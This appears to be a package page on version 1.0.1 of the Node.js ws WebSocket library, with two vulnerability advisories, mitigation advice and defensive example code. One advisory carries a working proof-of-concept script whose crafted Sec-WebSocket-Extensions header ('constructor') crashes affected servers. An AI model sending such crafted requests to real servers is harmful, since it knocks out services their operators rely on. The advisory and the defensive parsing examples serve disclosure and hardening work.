ws, a popular and performant WebSocket library for Node.js, saw a small version bump from 1.0.0 to 1.0.1, released on January 4, 2016. While the core functionality described remains the same (a simple, fast, well-tested WebSocket implementation that follows RFC 6455), examining the package metadata reveals subtle improvements and points of interest for developers.
The dependency lists for both versions are identical, relying on "ultron" for managing event listeners and "options" for configuration. The development dependencies also remain unchanged, utilizing tools like "mocha," "should," and "expect.js" for testing, and "benchmark" for performance analysis. "bufferutil" and "utf-8-validate" are crucial for efficient and secure WebSocket frame handling, hinting at a focus on performance and security within the library.
The key difference lies in the "releaseDate": version 1.0.1 was released approximately 5 days after 1.0.0. This suggests that 1.0.1 is a patch release addressing minor bugs, optimizations, or security concerns identified in the initial 1.0.0 version. While the specific changes aren't available in the provided data, developers should prefer the latest version (1.0.1) to pick up any bug fixes or minor enhancements from this iterative release and so obtain a more stable and secure WebSocket implementation for their applications.
All the vulnerabilities related to version 1.0.1 of the package
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later. Alternatively, set the maxPayload option for the ws server to a value smaller than 256MB.
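To make the payload-limit mitigation concrete, the following added example (my code, not the ws project's) decodes the length field of a WebSocket frame header as laid out in RFC 6455 section 5.2 and refuses a frame whose declared length exceeds a limit before any data is buffered, which is the point at which a maxPayload setting takes effect inside a server. The 100 MiB default, the function names and the frame headers built for the check are constructed for this illustration; close code 1009 is the RFC's "message too big" status.

```javascript
// Added example (not from the ws project): check a WebSocket frame's declared
// payload length against a limit before buffering anything.
// Frame header layout (RFC 6455 section 5.2):
//   byte 0: FIN(1) RSV(3) opcode(4)
//   byte 1: MASK(1) payload-len(7); 126 => 16-bit length follows,
//           127 => 64-bit length follows (MSB must be 0)
//   then 4 masking-key bytes if MASK is set.
const DEFAULT_MAX_PAYLOAD = 100 * 1024 * 1024; // constructed default: 100 MiB

// Parse the fixed header. Returns null when more bytes are needed, or an
// object with an `error` field when the header is invalid.
function parseFrameHeader(buf) {
  if (buf.length < 2) return null;
  const fin = (buf[0] & 0x80) !== 0;
  const opcode = buf[0] & 0x0f;
  const masked = (buf[1] & 0x80) !== 0;
  let payloadLength = buf[1] & 0x7f;
  let offset = 2;

  if (payloadLength === 126) {
    if (buf.length < 4) return null;
    payloadLength = buf.readUInt16BE(2);
    offset = 4;
  } else if (payloadLength === 127) {
    if (buf.length < 10) return null;
    const hi = buf.readUInt32BE(2);
    const lo = buf.readUInt32BE(6);
    if (hi & 0x80000000) return { error: 'invalid length (MSB set)' };
    payloadLength = hi * 0x100000000 + lo; // exact below 2^53
    offset = 10;
  }
  if (masked) offset += 4;
  return { fin, opcode, masked, payloadLength, headerLength: offset };
}

// The decision a server makes before allocating: a frame that declares more
// than maxPayload is refused (close code 1009, "message too big") instead
// of being accumulated until memory runs out.
function checkFrame(buf, maxPayload = DEFAULT_MAX_PAYLOAD) {
  const h = parseFrameHeader(buf);
  if (h === null) return { ok: false, reason: 'incomplete header' };
  if (h.error) return { ok: false, reason: h.error };
  if (h.payloadLength > maxPayload) {
    return { ok: false, reason: 'payload too large', closeCode: 1009, declared: h.payloadLength };
  }
  return { ok: true, declared: h.payloadLength };
}

// Build a header that declares `payloadLength` bytes (constructed test input;
// no payload bytes are attached, which is exactly why the check must not
// wait for them).
function buildHeader(payloadLength, { masked = true, opcode = 0x2 } = {}) {
  let buf;
  if (payloadLength < 126) {
    buf = Buffer.alloc(2);
    buf[1] = payloadLength;
  } else if (payloadLength <= 0xffff) {
    buf = Buffer.alloc(4);
    buf[1] = 126;
    buf.writeUInt16BE(payloadLength, 2);
  } else {
    buf = Buffer.alloc(10);
    buf[1] = 127;
    buf.writeUInt32BE(Math.floor(payloadLength / 0x100000000), 2);
    buf.writeUInt32BE(payloadLength % 0x100000000, 6);
  }
  buf[0] = 0x80 | opcode; // FIN set, binary frame
  if (masked) {
    buf[1] |= 0x80;
    buf = Buffer.concat([buf, Buffer.alloc(4)]); // zero masking key
  }
  return buf;
}

// A header claiming 300 MiB is refused without a single payload byte read.
console.log(checkFrame(buildHeader(300 * 1024 * 1024)));
```

The same idea applies whichever side does the checking: the limit is compared against the length the peer declares, not against what has already arrived, so the process never commits memory it has not agreed to.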
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
// Proof of concept from the advisory: the server connects to itself and sends
// an upgrade request whose Sec-WebSocket-Extensions header names an
// Object.prototype property, which crashes affected ws versions.
const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'
  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
Update to version 3.3.1 or later.
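As an added example of how a header parser avoids the crash class described above (my code, not the fix shipped in ws 3.3.1), the following parses a Sec-WebSocket-Extensions header into prototype-less containers created with Object.create(null), so a name such as constructor or __proto__ is an ordinary key with no inherited value to trip over, and wraps the parse so a malformed header like the ',;constructor' variant in the PoC becomes a rejected handshake rather than an exception escaping the request handler. The function names and the simplified grammar are my own; the grammar follows RFC 6455 section 9.1.

```javascript
// Added example, not code from the ws project: parse Sec-WebSocket-Extensions
// without ever consulting an inherited Object.prototype member.
// Simplified grammar (RFC 6455 section 9.1):
//   header    = extension *( "," extension )
//   extension = token *( ";" parameter )
//   parameter = token [ "=" ( token | quoted-string ) ]
const TOKEN_RE = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

function parseExtensions(header) {
  // A null-prototype object has no "constructor", "__proto__" or
  // "hasOwnProperty" to inherit, so every lookup below sees only what this
  // parser stored.
  const offers = Object.create(null);

  for (const rawExt of header.split(',')) {
    const ext = rawExt.trim();
    if (ext === '') continue; // tolerate an empty list element (", ,")

    const [rawName, ...rawParams] = ext.split(';');
    const name = rawName.trim();
    if (!TOKEN_RE.test(name)) {
      throw new SyntaxError(`invalid extension name ${JSON.stringify(name)}`);
    }

    const params = Object.create(null);
    for (const rawParam of rawParams) {
      const p = rawParam.trim();
      const eq = p.indexOf('=');
      const key = (eq === -1 ? p : p.slice(0, eq)).trim();
      if (!TOKEN_RE.test(key)) {
        throw new SyntaxError(`invalid parameter name ${JSON.stringify(key)}`);
      }
      if (key in params) { // only own keys: there is no prototype chain
        throw new SyntaxError(`duplicate parameter ${key}`);
      }
      let value = true; // a bare parameter carries no value
      if (eq !== -1) {
        value = p.slice(eq + 1).trim();
        if (value.length >= 2 && value.startsWith('"') && value.endsWith('"')) {
          value = value.slice(1, -1); // quoted-string wrapping a token
        }
        if (!TOKEN_RE.test(value)) {
          throw new SyntaxError(`invalid parameter value for ${key}`);
        }
      }
      params[key] = value;
    }

    // With a {} literal, offers.constructor would already be Function and
    // offers.constructor.push would throw a TypeError. Here it is undefined
    // until this parser assigns it.
    if (offers[name] === undefined) offers[name] = [params];
    else offers[name].push(params);
  }
  return offers;
}

// Handshake-side wrapper: a malformed header must become a rejected upgrade
// (HTTP 400), never an uncaught exception that takes the process down.
function negotiateExtensions(header) {
  try {
    return { ok: true, offers: parseExtensions(header) };
  } catch (err) {
    if (err instanceof SyntaxError) {
      return { ok: false, status: 400, reason: err.message };
    }
    throw err;
  }
}

// The two payloads from the PoC: one parses as a harmless extension name,
// the other is rejected as malformed. Neither reaches an inherited property.
console.log(negotiateExtensions('constructor'));
console.log(negotiateExtensions(',;constructor'));
```

Two properties matter here and both are checked independently: the containers have no prototype, so hostile names cannot resolve to anything the parser did not put there, and the parse is fenced by a try/catch at the handshake boundary, so even a genuinely malformed header costs the attacker a 400 response rather than the server its process.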